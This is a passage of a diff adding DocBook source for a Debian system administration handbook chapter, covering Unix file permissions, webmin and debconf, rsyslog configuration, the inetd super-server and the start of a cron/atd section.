+      provide complete desktops for mobile users (or for less powerful
+      desktop systems, configured as thin clients). Users simply login to
+      the server's screen with <command>vncviewer
+      <replaceable>server</replaceable>:50</command>, because the port used
+      is 5950.</para>
+      <indexterm><primary><emphasis role="pkg">vnc4server</emphasis></primary></indexterm>
+    </section>
+  </section>
+  <section id="sect.rights-management">
+    <title>Managing Rights</title>
+
+    <para>Linux is definitely a multi-user system, so it is necessary to
+    provide a permission system to control the set of authorized operations
+    on files and directories, which includes all the system resources and
+    devices (on a Unix system, any device is represented by a file or
+    directory). This principle is common to all Unix systems, but a
+    reminder is always useful, especially as there are some interesting and
+    relatively unknown advanced uses.</para>
+    <indexterm><primary>rights</primary></indexterm>
+    <indexterm><primary>permissions</primary></indexterm>
+    <indexterm><primary>user</primary><secondary>owner</secondary></indexterm>
+    <indexterm><primary>group</primary><secondary>owner</secondary></indexterm>
+    <indexterm><primary>owner</primary><secondary>user</secondary></indexterm>
+    <indexterm><primary>owner</primary><secondary>group</secondary></indexterm>
+
+    <para>Each file or directory has specific permissions for three categories
+    of users:</para>
+    <itemizedlist>
+      <listitem>
+	<para>its owner (symbolized by <literal>u</literal> as in
+	“user”);</para>
+      </listitem>
+      <listitem>
+	<para>its owner group (symbolized by <literal>g</literal> as in
+	“group”), representing all the members of the group;</para>
+      </listitem>
+      <listitem>
+	<para>the others (symbolized by <literal>o</literal> as in
+	“other”).</para>
+      </listitem>
+    </itemizedlist>
+
+    <para>Three types of rights can be combined:</para>
+    <itemizedlist>
+      <listitem>
+	<para>reading (symbolized by <literal>r</literal> as in
+	“read”);</para>
+      </listitem>
+      <listitem>
+	<para>writing (or modifying, symbolized by <literal>w</literal> as
+	in “write”);</para>
+      </listitem>
+      <listitem>
+	<para>executing (symbolized by <literal>x</literal> as in
+	“eXecute”).</para>
+      </listitem>
+    </itemizedlist>
+    <indexterm><primary>read, right</primary></indexterm>
+    <indexterm><primary>write, right</primary></indexterm>
+    <indexterm><primary>modification, right</primary></indexterm>
+    <indexterm><primary>execution, right</primary></indexterm>
+
+    <para>In the case of a file, these rights are easily understood: read
+    access allows reading the content (including copying), write access
+    allows changing it, and execute access allows you to run it (which will
+    only work if it is a program).</para>
+
+    <sidebar>
+      <title><emphasis>SECURITY</emphasis> <literal>setuid</literal> and <literal>setgid</literal> executables</title>
+
+      <para>Two particular rights are relevant to executable files:
+      <literal>setuid</literal> and <literal>setgid</literal> (symbolized
+      with the letter “s”). Note that we frequently speak of “bit”,
+      since each of these boolean values can be represented by a 0 or a 1.
+      These two rights allow any user to execute the program with the
+      rights of the owner or the group, respectively. This mechanism grants
+      access to features requiring higher level permissions than those you
+      would usually have.</para>
+      <indexterm><primary><literal>setuid</literal>, right</primary></indexterm>
+      <indexterm><primary><literal>setgid</literal>, right</primary></indexterm>
+
+      <para>Since a <literal>setuid</literal> root program is
+      systematically run under the super-user identity, it is very
+      important to ensure it is secure and reliable. Indeed, a user who
+      would manage to subvert it to call a command of their choice could
+      then impersonate the root user and have all rights on the
+      system.</para>
+    </sidebar>
+
+    <para>A directory is handled differently. Read access gives the right
+    to consult the list of its entries (files and directories), write
+    access allows creating or deleting files, and execute access allows
+    crossing through it (especially to go there with the
+    <command>cd</command> command). Being able to cross through a directory
+    without being able to read it gives permission to access the entries
+    therein that are known by name, but not to find them if you do not know
+    their existence or their exact name.</para>
+
+    <sidebar id="sidebar.setgid-dir">
+      <title><emphasis>SECURITY</emphasis> <literal>setgid</literal> directory and <emphasis>sticky bit</emphasis></title>
+      <indexterm><primary><literal>setgid</literal> directory</primary></indexterm>
+
+      <para>The <literal>setgid</literal> bit also applies to directories.
+      Any newly-created item in such directories is automatically assigned
+      the owner group of the parent directory, instead of inheriting the
+      creator's main group as usual. This setup avoids the user having to
+      change its main group (with the <command>newgrp</command> command)
+      when working in a file tree shared between several users of the same
+      dedicated group.</para>
+      <indexterm><primary>sticky bit</primary></indexterm>
+
+      <para>The “sticky” bit (symbolized by the letter “t”) is a
+      permission that is only useful in directories. It is especially used
+      for temporary directories where everybody has write access (such as
+      <filename>/tmp/</filename>): it restricts deletion of files so that
+      only their owner (or the owner of the parent directory) can do it.
+      Lacking this, everyone could delete other users' files in
+      <filename>/tmp/</filename>.</para>
+    </sidebar>
+
+    <para>Three commands control the permissions associated with a
+    file:</para>
+    <itemizedlist>
+      <listitem>
+	<para><command>chown <replaceable>user</replaceable>
+	<replaceable>file</replaceable></command> changes the owner of the
+	file;</para>
+      </listitem>
+      <listitem>
+	<para><command>chgrp <replaceable>group</replaceable>
+	<replaceable>file</replaceable></command> alters the owner
+	group;</para>
+      </listitem>
+      <listitem>
+	<para><command>chmod <replaceable>rights</replaceable>
+	<replaceable>file</replaceable></command> changes the permissions
+	for the file.</para>
+      </listitem>
+    </itemizedlist>
+
+    <para>There are two ways of presenting rights. Among them, the symbolic
+    representation is probably the easiest to understand and remember. It
+    involves the letter symbols mentioned above. You can define rights for
+    each category of users
+    (<literal>u</literal>/<literal>g</literal>/<literal>o</literal>), by
+    setting them explicitly (with <literal>=</literal>), by adding
+    (<literal>+</literal>), or subtracting (<literal>-</literal>). Thus the
+    <literal>u=rwx,g+rw,o-r</literal> formula gives the owner read, write,
+    and execute rights, adds read and write rights for the owner group, and
+    removes read rights for other users. Rights not altered by the addition
+    or subtraction in such a command remain unmodified. The letter
+    <literal>a</literal>, for “all”, covers all three categories of
+    users, so that <literal>a=rx</literal> grants all three categories the
+    same rights (read and execute, but not write).</para>
+    <indexterm><primary><command>chmod</command></primary></indexterm>
+    <indexterm><primary><command>chown</command></primary></indexterm>
+    <indexterm><primary><command>chgrp</command></primary></indexterm>
+    <indexterm><primary>octal representation of rights</primary></indexterm>
+    <indexterm><primary>rights</primary><secondary>octal representation</secondary></indexterm>
+
+    <para>The (octal) numeric representation associates each right with a
+    value: 4 for read, 2 for write, and 1 for execute. We associate each
+    combination of rights with the sum of the figures. Each value is then
+    assigned to different categories of users by putting them end to end in
+    the usual order (owner, group, others).</para>
+
+    <para>For instance, the <command>chmod 754
+    <replaceable>file</replaceable></command> command will set the
+    following rights: read, write and execute for the owner (since 7 = 4 +
+    2 + 1); read and execute for the group (since 5 = 4 + 1); read-only for
+    others. The <literal>0</literal> means no rights; thus <command>chmod
+    600 <replaceable>file</replaceable></command> allows for read/write
+    rights for the owner, and no rights for anyone else. The most frequent
+    right combinations are <literal>755</literal> for executable files and
+    directories, and <literal>644</literal> for data files.</para>
+
+    <para>To represent special rights, you can prefix a fourth digit to
+    this number according to the same principle, where the
+    <literal>setuid</literal>, <literal>setgid</literal> and
+    <literal>sticky</literal> bits are 4, 2 and 1, respectively.
+    <command>chmod 4754</command> will associate the
+    <literal>setuid</literal> bit with the previously described
+    rights.</para>
+
+    <para>Note that the use of octal notation only allows to set all the
+    rights at once on a file; you cannot use it to simply add a new right,
+    such as read access for the group owner, since you must take into
+    account the existing rights and compute the new corresponding numerical
+    value.</para>
+
+    <sidebar>
+      <title><emphasis>TIP</emphasis> Recursive operation</title>
+
+      <para>Sometimes we have to change rights for an entire file tree. All
+      the commands above have a <literal>-R</literal> option to operate
+      recursively in sub-directories.</para>
+
+      <para>The distinction between directories and files sometimes causes
+      problems with recursive operations. That is why the “X” letter has
+      been introduced in the symbolic representation of rights. It
+      represents a right to execute which applies only to directories (and
+      not to files lacking this right). Thus, <command>chmod -R a+X
+      <replaceable>directory</replaceable></command> will only add execute
+      rights for all categories of users (<literal>a</literal>) for all of
+      the sub-directories and files for which at least one category of user
+      (even if their sole owner) already has execute rights.</para>
+    </sidebar>
+
+    <sidebar>
+      <title><emphasis>TIP</emphasis> Changing the user and group</title>
+
+      <para>Frequently you want to change the group of a file at the
+      same time that you change the owner. The
+      <command>chown</command> command has a special syntax for that:
+      <command>chown
+      <replaceable>user</replaceable>:<replaceable>group</replaceable>
+      <replaceable>file</replaceable></command></para>
+    </sidebar>
+
+    <sidebar>
+      <title><emphasis>GOING FURTHER</emphasis> <command>umask</command></title>
+
+      <para>When an application creates a file, it assigns indicative
+      permissions, knowing that the system automatically removes certain
+      rights, given by the command <command>umask</command>. Enter
+      <command>umask</command> in a shell; you will see a mask such as
+      <computeroutput>0022</computeroutput>. This is simply an octal
+      representation of the rights to be systematically removed (in this
+      case, the write right for the group and other users).</para>
+      <indexterm><primary>umask</primary></indexterm>
+      <indexterm><primary>rights</primary><secondary>mask</secondary></indexterm>
+      <indexterm><primary>mask</primary><secondary>rights mask</secondary></indexterm>
+
+      <para>If you give it a new octal value, the <command>umask</command>
+      command modifies the mask. Used in a shell initialization file (for
+      example, <filename>~/.bash_profile</filename>), it will effectively
+      change the default mask for your work sessions.</para>
+    </sidebar>
+  </section>
+  <section id="sect.administration-interfaces">
+    <title>Administration Interfaces</title>
+    <indexterm><primary>interface</primary><secondary>administration interface</secondary></indexterm>
+    <indexterm><primary>administration, interfaces</primary></indexterm>
+
+    <para>Using a graphical interface for administration is interesting in
+    various circumstances. An administrator does not necessarily know all
+    the configuration details for all their services, and doesn't always
+    have the time to go seeking out the documentation on the matter. A
+    graphical interface for administration can thus accelerate the
+    deployment of a new service. It can also simplify the setup of services
+    which are hard to configure.</para>
+
+    <para>Such an interface is only an aid, and not an end in itself. In
+    all cases, the administrator must master its behavior in order to
+    understand and work around any potential problem.</para>
+
+    <para>Since no interface is perfect, you may be tempted to try several
+    solutions. This is to be avoided as much as possible, since different
+    tools are sometimes incompatible in their work methods. Even if they
+    all aim to be very flexible and try to adopt the configuration file
+    as a single reference, they are not always able to integrate external
+    changes.</para>
+    <section id="sect.webmin">
+      <title>Administrating on a Web Interface: <command>webmin</command></title>
+      <indexterm><primary><emphasis>webmin</emphasis></primary></indexterm>
+
+      <para>This is, without a doubt, one of the most successful
+      administration interfaces. It is a modular system managed through a
+      web browser, covering a wide array of areas and tools. Furthermore,
+      it is internationalized and available in many languages.</para>
+
+      <para>Sadly, <command>webmin</command> is no longer part of Debian.
+      Its Debian maintainer — Jaldhar H. Vyas — removed the packages he created
+      because he no longer had the time required to maintain them at an
+      acceptable quality level. Nobody has officially taken over, so
+      <emphasis role="distribution">Jessie</emphasis> does not have the
+      <command>webmin</command> package.</para>
+
+      <para>There is, however, an unofficial package distributed on the
+      <literal>webmin.com</literal> website. Contrary to the original
+      Debian packages, this package is monolithic; all of its configuration
+      modules are installed and activated by default, even if the
+      corresponding service is not installed on the machine.</para>
+
+      <sidebar>
+        <title><emphasis>SECURITY</emphasis> Changing the root password</title>
+
+	<para>On the first login, identification is conducted with the root
+	username and its usual password. It is recommended to change the
+	password used for <command>webmin</command> as soon as possible, so
+	that if it is compromised, the root password for the server will
+	not be involved, even if this confers important administrative
+	rights to the machine.</para>
+
+	<para>Beware! Since <command>webmin</command> has so many features,
+	a malicious user accessing it could compromise the security of the
+	entire system. In general, interfaces of this kind are not
+	recommended for important systems with strong security constraints
+	(firewall, sensitive servers, etc.).</para>
+      </sidebar>
+
+      <para>Webmin is used through a web interface, but it does not require
+      Apache to be installed. Essentially, this software has its own
+      integrated mini web server. This server listens by default on port
+      10000 and accepts secure HTTP connections.</para>
+
+      <para>Included modules cover a wide variety of services, among
+      which:</para>
+      <itemizedlist>
+        <listitem>
+	  <para>all base services: creation of users and groups, management
+	  of <filename>crontab</filename> files, init scripts, viewing of
+	  logs, etc.</para>
+        </listitem>
+        <listitem>
+	  <para>bind: DNS server configuration (name service);</para>
+        </listitem>
+        <listitem>
+	  <para>postfix: SMTP server configuration (e-mail);</para>
+        </listitem>
+        <listitem>
+	  <para>inetd: configuration of the <command>inetd</command>
+	  super-server;</para>
+        </listitem>
+        <listitem>
+	  <para>quota: user quota management;</para>
+        </listitem>
+        <listitem>
+	  <para>dhcpd: DHCP server configuration;</para>
+        </listitem>
+        <listitem>
+	  <para>proftpd: FTP server configuration;</para>
+        </listitem>
+        <listitem>
+	  <para>samba: Samba file server configuration;</para>
+        </listitem>
+        <listitem>
+	  <para>software: installation or removal of software from Debian
+	  packages and system updates.</para>
+        </listitem>
+      </itemizedlist>
+
+      <para>The administration interface is available in a web browser at
+      <literal>https://localhost:10000</literal>. Beware! Not all the
+      modules are directly usable. Sometimes they must be configured by
+      specifying the locations of the corresponding configuration files and
+      some executable files (program). Frequently the system will politely
+      prompt you when it fails to activate a requested module.</para>
+
+      <sidebar>
+        <title><emphasis>ALTERNATIVE</emphasis> GNOME control center</title>
+        <indexterm><primary><emphasis role="pkg">gnome-control-center</emphasis></primary></indexterm>
+
+	<para>The GNOME project also provides multiple administration
+	interfaces that are usually accessible via the “Settings”
+	entry in the user menu on the top right.
+	<command>gnome-control-center</command> is the main program
+	that brings them all together but many of the system wide
+	configuration tools are effectively provided by other packages
+	(<emphasis role="pkg">accountsservice</emphasis>, <emphasis role="pkg">system-config-printer</emphasis>, etc.).  Although
+	they are easy to use, these applications cover only a limited
+	number of base services: user management, time configuration,
+	network configuration, printer configuration, and so
+	on.</para>
+      </sidebar>
+    </section>
+    <section id="sect.debconf">
+      <title>Configuring Packages: <command>debconf</command></title>
+      <indexterm><primary><command>debconf</command></primary></indexterm>
+      <indexterm><primary><command>dpkg-reconfigure</command></primary></indexterm>
+
+      <para>Many packages are automatically configured after asking a few
+      questions during installation through the Debconf tool. These
+      packages can be reconfigured by running <command>dpkg-reconfigure
+      <replaceable>package</replaceable></command>.</para>
+
+      <para>For most cases, these settings are very simple; only a few
+      important variables in the configuration file are changed. These
+      variables are often grouped between two “demarcation” lines so
+      that reconfiguration of the package only impacts the enclosed area.
+      In other cases, reconfiguration will not change anything if the
+      script detects a manual modification of the configuration file, in
+      order to preserve these human interventions (because the script can't
+      ensure that its own modifications will not disrupt the existing
+      settings).</para>
+
+      <sidebar>
+        <title><emphasis>DEBIAN POLICY</emphasis> Preserving changes</title>
+
+	<para>The Debian Policy expressly stipulates that everything should
+	be done to preserve manual changes made to a configuration file, so
+	more and more scripts take precautions when editing configuration
+	files. The general principle is simple: the script will only make
+	changes if it knows the status of the configuration file, which is
+	verified by comparing the checksum of the file against that of the
+	last automatically generated file. If they are the same, the script
+	is authorized to change the configuration file. Otherwise, it
+	determines that the file has been changed and asks what action it
+	should take (install the new file, save the old file, or try to
+	integrate the new changes with the existing file). This
+	precautionary principle has long been unique to Debian, but other
+	distributions have gradually begun to embrace it.</para>
+
+	<para>The <command>ucf</command> program (from the Debian package
+	of the same name) can be used to implement such a behavior.</para>
+        <indexterm><primary><command>ucf</command></primary></indexterm>
+      </sidebar>
+    </section>
+  </section>
+  <section id="sect.syslog">
+    <title><command>syslog</command> System Events</title>
+    <indexterm><primary><command>rsyslogd</command></primary></indexterm>
+    <indexterm><primary>files</primary><secondary>log files</secondary></indexterm>
+    <indexterm><primary>logs</primary><secondary>dispatching</secondary></indexterm>
+    <section id="sect.syslog-principe">
+      <title>Principle and Mechanism</title>
+
+      <para>The <command>rsyslogd</command> daemon is responsible for
+      collecting service messages coming from applications and the kernel,
+      then dispatching them into log files (usually stored in the
+      <filename>/var/log/</filename> directory). It obeys the
+      <filename>/etc/rsyslog.conf</filename> configuration file.</para>
+
+      <para>Each log message is associated with an application subsystem
+      (called “facility” in the documentation):</para>
+      <itemizedlist>
+        <listitem>
+	  <para><literal>auth</literal> and <literal>authpriv</literal>:
+	  for authentication;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>cron</literal>: comes from task scheduling
+	  services, <command>cron</command> and
+	  <command>atd</command>;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>daemon</literal>: affects a daemon without any
+	  special classification (DNS, NTP, etc.);</para>
+        </listitem>
+        <listitem>
+	  <para><literal>ftp</literal>: concerns the FTP server;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>kern</literal>: message coming from the
+	  kernel;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>lpr</literal>: comes from the printing
+	  subsystem;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>mail</literal>: comes from the e-mail
+	  subsystem;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>news</literal>: Usenet subsystem message
+	  (especially from an NNTP — Network News Transfer Protocol —
+	  server that manages newsgroups);</para>
+        </listitem>
+        <listitem>
+	  <para><literal>syslog</literal>: messages from the
+	  <command>syslogd</command> server, itself;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>user</literal>: user messages (generic);</para>
+        </listitem>
+        <listitem>
+	  <para><literal>uucp</literal>: messages from the UUCP server
+	  (Unix to Unix Copy Program, an old protocol notably used to
+	  distribute e-mail messages);</para>
+        </listitem>
+        <listitem>
+	  <para><literal>local0</literal> to <literal>local7</literal>:
+	  reserved for local use.</para>
+        </listitem>
+      </itemizedlist>
+
+      <para>Each message is also associated with a priority level. Here is
+      the list in decreasing order:</para>
+      <itemizedlist>
+        <listitem>
+	  <para><literal>emerg</literal>: “Help!” There is an emergency,
+	  the system is probably unusable.</para>
+        </listitem>
+        <listitem>
+	  <para><literal>alert</literal>: hurry up, any delay can be
+	  dangerous, action must be taken immediately;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>crit</literal>: conditions are critical;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>err</literal>: error;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>warn</literal>: warning (potential error);</para>
+        </listitem>
+        <listitem>
+	  <para><literal>notice</literal>: conditions are normal, but the
+	  message is important;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>info</literal>: informative message;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>debug</literal>: debugging message.</para>
+        </listitem>
+      </itemizedlist>
+    </section>
+    <section id="sect.syslog-config">
+      <title>The Configuration File</title>
+
+      <para>The syntax of the <filename>/etc/rsyslog.conf</filename> file
+      is detailed in the
+      <citerefentry><refentrytitle>rsyslog.conf</refentrytitle><manvolnum>5</manvolnum></citerefentry>
+      manual page, but there is also HTML documentation available in the
+      <emphasis role="pkg">rsyslog-doc</emphasis> package
+      (<filename>/usr/share/doc/rsyslog-doc/html/index.html</filename>).
+      The overall principle is to write “selector” and “action”
+      pairs. The selector defines all relevant messages, and the actions
+      describes how to deal with them.</para>
+      <section id="sect.syslog-selector-syntax">
+        <title>Syntax of the Selector</title>
+
+	<para>The selector is a semicolon-separated list of
+	<literal><replaceable>subsystem</replaceable>.<replaceable>priority</replaceable></literal>
+	pairs (example: <literal>auth.notice;mail.info</literal>). An
+	asterisk may represent all subsystems or all priorities (examples:
+	<literal>*.alert</literal> or <literal>mail.*</literal>). Several
+	subsystems can be grouped, by separating them with a comma
+	(example: <literal>auth,mail.info</literal>). The priority
+	indicated also covers messages of equal or higher priority; thus
+	<literal>auth.alert</literal> indicates the <literal>auth</literal>
+	subsystem messages of <literal>alert</literal> or
+	<literal>emerg</literal> priority. Prefixed with an exclamation
+	point (!), it indicates the opposite, in other words the strictly
+	lower priorities; <literal>auth.!notice</literal>, thus, indicates
+	messages issued from <literal>auth</literal>, with
+	<literal>info</literal> or <literal>debug</literal> priority.
+	Prefixed with an equal sign (=), it corresponds to precisely and
+	only the priority indicated (<literal>auth.=notice</literal> only
+	concerns messages from <literal>auth</literal> with
+	<literal>notice</literal> priority).</para>
+
+	<para>Each element in the list on the selector overrides previous
+	elements. It is thus possible to restrict a set or to exclude
+	certain elements from it. For example,
+	<literal>kern.info;kern.!err</literal> means messages from the
+	kernel with priority between <literal>info</literal> and
+	<literal>warn</literal>. The <literal>none</literal> priority
+	indicates the empty set (no priorities), and may serve to exclude a
+	subsystem from a set of messages. Thus,
+	<literal>*.crit;kern.none</literal> indicates all the messages of
+	priority equal to or higher than <literal>crit</literal> not coming
+	from the kernel.</para>
+      </section>
+      <section id="sect.syslog-action-syntax">
+        <title>Syntax of Actions</title>
+
+        <sidebar>
+          <title><emphasis>BACK TO BASICS</emphasis> The named pipe, a persistent pipe</title>
+          <indexterm><primary>named pipe</primary></indexterm>
+          <indexterm><primary>pipe, named pipe</primary></indexterm>
+
+	  <para>A named pipe is a particular type of file that operates
+	  like a traditional pipe (the pipe that you make with the “|”
+	  symbol on the command line), but via a file. This mechanism has
+	  the advantage of being able to relate two unrelated processes.
+	  Anything written to a named pipe blocks the process that writes
+	  until another process attempts to read the data written. This
+	  second process reads the data written by the first, which can
+	  then resume execution.</para>
+
+	  <para>Such a file is created with the <command>mkfifo</command>
+	  command.</para>
+        </sidebar>
+
+	<para>The various possible actions are:</para>
+        <itemizedlist>
+          <listitem>
+	    <para>add the message to a file (example:
+	    <filename>/var/log/messages</filename>);</para>
+          </listitem>
+          <listitem>
+	    <para>send the message to a remote <command>syslog</command>
+	    server (example: <literal>@log.falcot.com</literal>);</para>
+          </listitem>
+          <listitem>
+	    <para>send the message to an existing named pipe (example:
+	    <literal>|/dev/xconsole</literal>);</para>
+          </listitem>
+          <listitem>
+	    <para>send the message to one or more users, if they are logged
+	    in (example: <literal>root,rhertzog</literal>);</para>
+          </listitem>
+          <listitem>
+	    <para>send the message to all logged in users (example:
+	    <literal>*</literal>);</para>
+          </listitem>
+          <listitem>
+	    <para>write the message in a text console (example:
+	    <literal>/dev/tty8</literal>).</para>
+          </listitem>
+        </itemizedlist>
+
+        <sidebar>
+          <title><emphasis>SECURITY</emphasis> Forwarding logs</title>
+          <indexterm><primary>log</primary><secondary>forwarding</secondary></indexterm>
+
+	  <para>It is a good idea to record the most important logs on a
+	  separate machine (perhaps dedicated for this purpose), since this
+	  will prevent any possible intruder from removing traces of their
+	  intrusion (unless, of course, they also compromise this other
+	  server). Furthermore, in the event of a major problem (such as a
+	  kernel crash), you have the logs available on another machine,
+	  which increases your chances of determining the sequence of
+	  events that caused the crash.</para>
+
+	  <para>To accept log messages sent by other machines, you must
+	  reconfigure <emphasis>rsyslog</emphasis>: in practice, it is
+	  sufficient to activate the ready-for-use entries in
+	  <filename>/etc/rsyslog.conf</filename> (<literal>$ModLoad
+	  imudp</literal> and <literal>$UDPServerRun 514</literal>).</para>
+        </sidebar>
+      </section>
+    </section>
+  </section>
+  <section id="sect.inetd">
+    <title>The <command>inetd</command> Super-Server</title>
+
+    <para>Inetd (often called “Internet super-server”) is a server of
+    servers. It executes rarely used servers on demand, so that they do not
+    have to run continuously.</para>
+    <indexterm><primary><command>inetd</command></primary></indexterm>
+    <indexterm><primary>super-server</primary></indexterm>
+
+    <para>The <filename>/etc/inetd.conf</filename> file lists these servers
+    and their usual ports. The <command>inetd</command> command listens to
+    all of them; when it detects a connection to any such port, it executes
+    the corresponding server program.</para>
+
+    <sidebar>
+      <title><emphasis>DEBIAN POLICY</emphasis> Register a server in <filename>inetd.conf</filename></title>
+
+      <para>Packages frequently want to register a new server in the
+      <filename>/etc/inetd.conf</filename> file, but Debian Policy
+      prohibits any package from modifying a configuration file that it
+      doesn't own. This is why the <command>update-inetd</command> script
+      (in the package with the same name) was created: It manages the
+      configuration file, and other packages can thus use it to register a
+      new server to the super-server's configuration.</para>
+    </sidebar>
+
+    <para>Each significant line of the <filename>/etc/inetd.conf</filename>
+    file describes a server through seven fields (separated by
+    spaces):</para>
+    <itemizedlist>
+      <listitem>
+	<para>The TCP or UDP port number, or the service name (which is
+	mapped to a standard port number with the information contained in
+	the <filename>/etc/services</filename> file).</para>
+      </listitem>
+      <listitem>
+	<para>The socket type: <literal>stream</literal> for a TCP
+	connection, <literal>dgram</literal> for UDP datagrams.</para>
+      </listitem>
+      <listitem>
+	<para>The protocol: <literal>tcp</literal> or
+	<literal>udp</literal>.</para>
+      </listitem>
+      <listitem>
+	<para>The options: two possible values: <literal>wait</literal> or
+	<literal>nowait</literal>, to tell <command>inetd</command> whether
+	it should wait or not for the end of the launched process before
+	accepting another connection. For TCP connections, easily
+	multiplexable, you can usually use <literal>nowait</literal>. For
+	programs responding over UDP, you should use
+	<literal>nowait</literal> only if the server is capable of managing
+	several connections in parallel. You can suffix this field with a
+	period, followed by the maximum number of connections authorized
+	per minute (the default limit is 256).</para>
+      </listitem>
+      <listitem>
+	<para>The user name of the user under whose identity the server
+	will run.</para>
+      </listitem>
+      <listitem>
+	<para>The full path to the server program to execute.</para>
+      </listitem>
+      <listitem>
+	<para>The arguments: this is a complete list of the program's
+	arguments, including its own name (<literal>argv[0]</literal> in
+	C).</para>
+      </listitem>
+    </itemizedlist>
+
+    <para>The following example illustrates the most common cases:</para>
+
+    <example id="example.inetd-conf">
+      <title>Excerpt from <filename>/etc/inetd.conf</filename></title>
+
+      <programlisting>talk   dgram  udp wait    nobody.tty /usr/sbin/in.talkd in.talkd
+finger stream tcp nowait  nobody     /usr/sbin/tcpd     in.fingerd
+ident  stream tcp nowait  nobody     /usr/sbin/identd   identd -i
+</programlisting>
+    </example>
+    <indexterm><primary><command>tcpd</command></primary></indexterm>
+
+    <para>The <command>tcpd</command> program is frequently used in the
+    <filename>/etc/inetd.conf</filename> file. It allows limiting incoming
+    connections by applying access control rules, documented in the
+    <citerefentry><refentrytitle>hosts_access</refentrytitle><manvolnum>5</manvolnum></citerefentry>
+    manual page, and which are configured in the
+    <filename>/etc/hosts.allow</filename> and
+    <filename>/etc/hosts.deny</filename> files. Once it has been determined
+    that the connection is authorized, <command>tcpd</command> executes the
+    real server (like <command>in.fingerd</command> in our
+    example). It is worth noting that <command>tcpd</command> relies on the
+    name under which it was invoked (that is the first argument,
+    <literal>argv[0]</literal>) to identify the real program
+    to run. So you should not start the arguments list with <literal>tcpd</literal>
+    but with the program that must be wrapped.</para>
+
+    <sidebar>
+      <title><emphasis>COMMUNITY</emphasis> Wietse Venema</title>
+      <indexterm><primary>Wietse Venema</primary></indexterm>
+      <indexterm><primary>Venema, Wietse</primary></indexterm>
+
+      <para>Wietse Venema, whose expertise in security has made him a
+      renowned programmer, is the author of the <command>tcpd</command>
+      program. He is also the main creator of Postfix, the modular e-mail
+      server (SMTP, Simple Mail Transfer Protocol), designed to be safer
+      and more reliable than <command>sendmail</command>, which features a
+      long history of security vulnerabilities.</para>
+    </sidebar>
+
+    <sidebar>
+      <title><emphasis>ALTERNATIVE</emphasis> Other <command>inetd</command> commands</title>
+
+      <para>While Debian installs <emphasis role="pkg">openbsd-inetd</emphasis> by default, there is no lack of
+      alternatives: we can mention <emphasis role="pkg">inetutils-inetd</emphasis>,
+      <emphasis role="pkg">micro-inetd</emphasis>,
+      <emphasis role="pkg">rlinetd</emphasis> and
+      <emphasis role="pkg">xinetd</emphasis>.</para>
+
+      <para>This last incarnation of a super-server offers very interesting
+      possibilities. Most notably, its configuration can be split into
+      several files (stored, of course, in the
+      <filename>/etc/xinetd.d/</filename> directory), which can make an
+      administrator's life easier.</para>
+
+      <para>Last but not least, it is even possible to emulate <command>inetd</command>'s
+      behaviour with <command>systemd</command>'s socket-activation
+      mechanism (see <xref linkend="sect.systemd" />).</para>
+    </sidebar>
+  </section>
+  <section id="sect.task-scheduling-cron-atd">
+    <title>Scheduling Tasks with <command>cron</command> and <command>atd</command></title>
+    <indexterm><primary><command>cron</command></primary></indexterm>
+    <indexterm><primary><command>atd</command></primary></indexterm>
+    <indexterm><primary>scheduled commands</primary></indexterm>
+    <indexterm><primary>command scheduling</primary></indexterm>
+
+    <para><command>cron</command> is the daemon responsible for executing
+    scheduled and recurring commands (every day, every week, etc.);
+    <command>atd</command> is that which deals with commands to be executed
+    a single time, but at a specific moment in the future.</para>
+
+    <para>In a Unix system, many tasks are scheduled for regular
+    execution:</para>
+    <itemizedlist>
+      <listitem>
+	<para>rotating the logs;</para>
+      </listitem>
+      <listitem>
+	<para>updating the database for the <command>locate</command>
+	program;</para>
+      </listitem>
+      <listitem>
+	<para>back-ups;</para>
+      </listitem>
+      <listitem>
+	<para>maintenance scripts (such as cleaning out temporary
+	files).</para>
+      </listitem>
+    </itemizedlist>
+
+    <para>By default, all users can schedule the execution of tasks. Each
+    user has thus their own <emphasis>crontab</emphasis> in which they can
+    record scheduled commands. It can be edited by running <command>crontab
+    -e</command> (its content is stored in the
+    <filename>/var/spool/cron/crontabs/<replaceable>user</replaceable></filename>
+    file).</para>
+
+    <sidebar>
+      <title><emphasis>SECURITY</emphasis> Restricting <command>cron</command> or <command>atd</command></title>
+
+      <para>You can restrict access to <command>cron</command> by creating
+      an explicit authorization file (whitelist) in
+      <filename>/etc/cron.allow</filename>, in which you indicate the only
+      users authorized to schedule commands. All others will automatically
+      be deprived of this feature. Conversely, to only block one or two
+      troublemakers, you could write their username in the explicit
+      prohibition file (blacklist), <filename>/etc/cron.deny</filename>.
+      This same feature is available for <command>atd</command>, with the
+      <filename>/etc/at.allow</filename> and
+      <filename>/etc/at.deny</filename> files.</para>
+    </sidebar>
+
+    <para>The root user has their own <emphasis>crontab</emphasis>, but can
+    also use the <filename>/etc/crontab</filename> file, or write
+    additional <emphasis>crontab</emphasis> files in the
+    <filename>/etc/cron.d</filename> directory. These last two solutions
+    have the advantage of being able to specify the user identity to use
+    when executing the command.</para>
+
+    <para>The <emphasis>cron</emphasis> package includes by default some
+    scheduled commands that execute:</para>
+    <itemizedlist>
+      <listitem>
+	<para>programs in the <filename>/etc/cron.hourly/</filename>
+	directory once per hour;</para>
+      </listitem>
+      <listitem>
+	<para>programs in <filename>/etc/cron.daily/</filename> once per
+	day;</para>
+      </listitem>
+      <listitem>
+	<para>programs in <filename>/etc/cron.weekly/</filename> once per
+	week;</para>
+      </listitem>
+      <listitem>
+	<para>programs in <filename>/etc/cron.monthly/</filename> once per
+	month.</para>
+      </listitem>
+    </itemizedlist>
+
+    <para>Many Debian packages rely on this service: by putting maintenance
+    scripts in these directories, they ensure optimal operation of their
+    services.</para>
+    <section id="sect.format-crontab">
+      <title>Format of a <filename>crontab</filename> File</title>
+      <indexterm><primary><filename>crontab</filename></primary></indexterm>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> Text shortcuts for <command>cron</command></title>
+
+	<para><command>cron</command> recognizes some abbreviations which
